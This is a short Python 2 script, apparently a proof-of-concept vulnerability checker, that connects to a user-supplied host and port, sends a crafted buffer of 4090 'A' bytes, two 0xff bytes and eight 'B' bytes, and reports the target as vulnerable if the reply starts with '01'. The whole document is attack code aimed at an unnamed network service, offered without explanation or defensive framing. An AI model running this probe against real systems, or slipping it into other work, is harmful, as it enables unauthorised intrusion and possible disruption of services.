import sys, socket

host = sys.argv[1] # Receive IP from user
port = int(sys.argv[2]) # Receive Port from user

part1=("A"*4090)
part2=(b'\xff\xff')
part3=("B"*8)

payload=part1+part2+part3

s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,port))
s.recv(1024)
s.send(payload)
response = s.recv(6000)
if (response[:2]=="01"):
        print "Target "+str(host)+":"+str(port)+" is vulnerable, response was "+response[:2]
else:   
        print "Target "+str(host)+":"+str(port)+" doesn't appaer vulnerable, response was "+response[:2]
